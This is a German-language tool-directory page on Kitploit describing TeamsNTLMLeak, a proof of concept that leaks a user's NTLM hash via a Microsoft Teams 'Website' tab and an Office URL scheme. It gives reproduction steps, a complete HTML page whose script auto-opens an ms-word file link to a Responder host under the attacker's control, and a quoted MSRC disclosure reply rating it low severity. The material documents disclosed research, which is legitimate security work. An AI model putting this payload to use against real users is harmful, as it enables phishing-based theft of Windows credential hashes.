Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
TeamsNTLMLeak — NTLM über den Website-Tab in Teams via MS Office leaken | Kitploit
Tools/GitHubGitHub/soufianetahiri/teamsntlmleak
PasswortangriffeExploitationInformationsbeschaffungPhishingSocial EngineeringRed TeamingAdversarial-Angriff
GitHubsoufianetahiri/teamsntlmleak

TeamsNTLMLeak

NTLM über den Website-Tab in Teams via MS Office leaken

Repository anzeigen
809vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Beschreibung

Wenn ein Benutzer zu einem „Website“-Tab navigiert, der auf eine speziell gestaltete Webseite verweist, kann dies zur Offenlegung des NTLM-Hashs durch die Aktivierung eines Office-URL-Schemas führen, wodurch der Prozess für das Leck auf einen einzigen Klick reduziert wird.

Wenn man versucht, einen Link im Format ms-word:ofv|u|file://Share/File.docx aus einem Browser zu öffnen, sind die folgenden Schritte erforderlich:

1- Der Benutzer muss seine Absicht bestätigen, Word zu öffnen.

2- Der Benutzer muss die Risiken anhand der Warnmeldung von MS Office anerkennen und akzeptieren.

Auf dem Website-Tab wird die Aktion des Benutzers jedoch darauf vereinfacht, nur das Risiko zu akzeptieren.

Reproduktionsschritte

  1. Führen Sie Responder auf einem „Angreifer“-Rechner aus
  2. Hosten Sie eine HTML-Seite, die den folgenden Code enthält:
root@kitploit:~
<html>
<head>
    <title>Auto Open Document</title>
</head>
<body>
    <a href="ms-word:ofv|u|file://ResponderIP_Or_MachineName/File.docx" id="autoOpenLink"></a>
    <script>
        window.onload = function() {
            document.getElementById('autoOpenLink').click();
        };
    </script>
</body>
</html>

3. Erstellen Sie in Teams einen „Website“-Tab, der auf die gerade eingerichtete Webseite verweist. 4. Rufen Sie den „Tab“ auf.

Wenn Sie den Tab besuchen, initiiert ein durch JavaScript ausgelöster Link automatisch das Öffnen von Word. Wenn der Benutzer der Aufforderung in Word zustimmt, indem er auf „Ja“ klickt, wird sein NTLM-Hash an den Rechner des „Angreifers“ übertragen.

Demo

PoC

Offenlegung

Am Mi., 27. März 2024, 20:23 schrieb Microsoft Security Response Center <[email protected]mailto:[[email protected]](mailto:[email protected])>:
Hallo,
Vielen Dank für Ihre Einsendung. Wir haben festgestellt, dass Ihr Befund gültig ist, aber nicht unseren Kriterien für eine sofortige Bearbeitung entspricht, da die Schwere des Problems gering ist. Unsere Ingenieure haben darauf hingewiesen, dass ein Benutzer vor dem Leak des NTLM-Hashs immer noch in Word oder anderen Office-Clients zustimmen müsste, was die Schwere reduziert. Wir haben Ihren Befund jedoch für eine zukünftige Überprüfung als Gelegenheit zur Verbesserung unserer Produkte und als Feature-Problem zur Verbesserung vorgemerkt. Für diese Überprüfung habe ich keine Zeitleiste. Da derzeit keine weiteren Maßnahmen erforderlich sind, schließe ich diesen Fall.
Mit freundlichen Grüßen,
MSRC

Sieht so aus, als wäre es in der Microsoft Teams-Version 24033.813.2773.520. behoben.

Tool herunterladen